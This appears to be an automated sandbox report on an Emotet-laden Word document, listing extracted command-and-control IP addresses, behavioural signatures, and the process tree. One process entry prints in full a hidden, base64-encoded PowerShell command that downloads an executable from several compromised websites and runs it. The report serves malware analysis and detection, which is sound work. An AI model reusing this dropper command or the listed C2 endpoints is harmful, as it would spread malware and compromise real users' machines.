Analysis

  • max time kernel
    28s
  • max time network
    25s
  • resource
    win10v191014

General

  • Target

    2c1d3996b5dcf03297c1ec77face21d06d9596e446c5910067274e1addb2a108

  • Sample

    191217-gxtn18tjge

  • SHA256

    2c1d3996b5dcf03297c1ec77face21d06d9596e446c5910067274e1addb2a108

Score
N/A

Malware Config

Extracted

Family

emotet

C2

190.38.252.45:443

105.225.77.21:80

181.167.35.84:80

164.68.115.146:8080

5.189.148.98:8080

46.105.128.215:8080

69.30.205.162:7080

190.161.67.63:80

81.82.247.216:80

72.69.99.47:80

172.90.70.168:443

91.117.31.181:80

200.71.112.158:53

51.77.113.97:8080

190.101.87.170:80

96.234.38.186:8080

190.146.14.143:443

86.70.224.211:80

88.247.26.78:80

175.103.239.50:80

rsa_pubkey.plain

Signatures

  • Executes dropped EXE 2 IoCs
  • emotet family
  • Drops Office document 4 IoCs
  • Checks system information in the registry (likely anti-VM) 2 TTPs 2 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs
  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Emotet Sync 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Checks processor information in registry (likely anti-VM) 2 TTPs 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2c1d3996b5dcf03297c1ec77face21d06d9596e446c5910067274e1addb2a108.doc" /o ""
    1⤵
    • Drops Office document
    • Checks system information in the registry (likely anti-VM)
    • Enumerates system info in registry
    • Suspicious use of FindShellTrayWindow
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Checks processor information in registry (likely anti-VM)
    PID:4800
  • C:\Windows\system32\SppExtComObj.exe
    C:\Windows\system32\SppExtComObj.exe -Embedding
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2032
  • C:\Windows\System32\SLUI.exe
    "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
    1⤵
      PID:4176
    • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
      Powershell -w hidden -en JABUAGsAZwBjAHIAaQByAHkAeABpAG8APQAnAEgAegBsAHcAZwBnAGQAawB4AG4AbABoACcAOwAkAEsAeQBxAGMAZABuAGIAdwByACAAPQAgACcAMwA1ADYAJwA7ACQASgBuAHcAZABxAHgAeABpAGMAcAB1AHQAPQAnAEMAdwB2AGsAdQB2AGUAYgAnADsAJABOAHIAdABqAHMAbQBiAHgAeQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQASwB5AHEAYwBkAG4AYgB3AHIAKwAnAC4AZQB4AGUAJwA7ACQATABsAGYAdwB4AHYAdQBpAG0AdwBvAD0AJwBMAHgAeABqAHIAagBoAGwAbgB5ACcAOwAkAE8AeQBxAHkAcQBlAGMAaQByAGcAcQA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAATgBlAHQALgB3AEUAYgBjAEwASQBlAG4AVAA7ACQAQwBqAHUAaQB6AHMAdgBvAHMAaAA9ACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AaQBuAGQAaQBhAG4ALQBlAHMAYwBvAHIAdABzAC0AcQBhAHQAYQByAC4AYwBvAG0ALwBqAGoAMAByAHAAegBsAC8AMwBnADkAZABxADgAbAB2AHAAawAtAG8AMgBqAHoAdABpAHoAaABwADAALQA2ADkAMQA5ADUANgA2ADUAMQAwAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBzAG8AZgBpAHkAYQBjAGwAdQBiAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AZgB5AGQAaQAxAGEAbgB2AG0AYwAtAHcAZABpAHgAZQB1AHUANgB2ADUALQAwADEAMwAxADQAMQAwADMAMAAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHMAaQB5AGkAbgBqAGkAYwBoAGEAbgBnAGoAaQBhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ARABjAHoAVQBqAEYAVgBlAC8AKgBoAHQAdABwADoALwAvAHQAegBwAHQAeQB6AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwA4AHAAcAA3ADQAbgBzAGgALQA3AHQAMAAxADcAbQB5ADUALQAyADkAMQA2ADIALwAqAGgAdAB0AHAAcwA6AC8ALwBrAGEAbQBhAGwAYwBhAGsAZQAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AZQBoAGYAWgBWAGkAWQBoAC8AJwAuACIAUwBQAGwAYABpAFQAIgAoACcAKgAnACkAOwAkAFEAcQB4AG8AegBxAGkAagBnAHMAZQBzAD0AJwBIAHYAbQBnAGkAbQBzAGsAawBtACcAOwBmAG8AcgBlAGEAYwBoACgAJABXAHQAdgBnAHoAeQB6AHgAbwB0ACAAaQBuACAAJABDAGoAdQBpAHoAcwB2AG8AcwBoACkAewB0AHIAeQB7ACQATwB5AHEAeQBxAGUAYwBpAHIAZwBxAC4AIgBkAGAAbwB3AGAATgBsAG8AQQBkAEYAYABJAEwARQAiACgAJABXAHQAdgBnAHoAeQB6AHgAbwB0ACwAIAAkAE4AcgB0AGoAcwBtAGIAeAB5ACkAOwAkAE0AcwB3AGUAeQBuAHYAYgBnAGYAPQAnAE4AZgBmAGEAZwBzAHMAZQBpAGcAYwBsACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQATgByAHQAagBzAG0AYgB4AHkAKQAuACIAbABlAE4AYABnAGAAVABIACIAIAAtAGcAZQAgADMAOQA2ADEAOAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAQQBgAFIAVAAiACgAJABOAHIAdABqAHMAbQBiAHgAeQApADsAJABYAGQAZwBmAGsAcgBvAGQAcQBtAGIAPQAnAFgAYQBlAGMAeQByAHQAZABnAHIAZQAnADsAYgByAGUAYQBrADsAJABTAGQAZwBwAGsAZgByAHkAeAB5AHoAegA9ACcAWQBiAHAAbwBlAHkAYwBoACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEEAbgBoAG4AbQBxAGwAYwA9ACcAWgBrAHgAYQBiAHcAYwBzAHoAYgBlACcA
      1⤵
      • Suspicious use of WriteProcessMemory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Modifies system certificate store
      PID:4056
    • C:\Users\Admin\356.exe
      "C:\Users\Admin\356.exe"
      1⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      • Suspicious use of SetWindowsHookEx
      PID:4516
    • C:\Users\Admin\356.exe
      --a14f3b52
      1⤵
      • Executes dropped EXE
      • Suspicious behavior: EmotetMutantsSpam
      • Emotet Sync
      • Suspicious use of SetWindowsHookEx
      PID:4584

    Network

    MITRE ATT&CK Enterprise v15

    MITRE ATT&CK Additional techniques

    • T1130

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\356.exe

    • C:\Users\Admin\356.exe

    • C:\Users\Admin\356.exe

    • memory/4516-10-0x0000000002230000-0x0000000002247000-memory.dmp

      Filesize

      92KB

    • memory/4584-12-0x00000000006B0000-0x00000000006C7000-memory.dmp

      Filesize

      92KB

    • memory/4584-13-0x0000000000400000-0x0000000000457000-memory.dmp

      Filesize

      348KB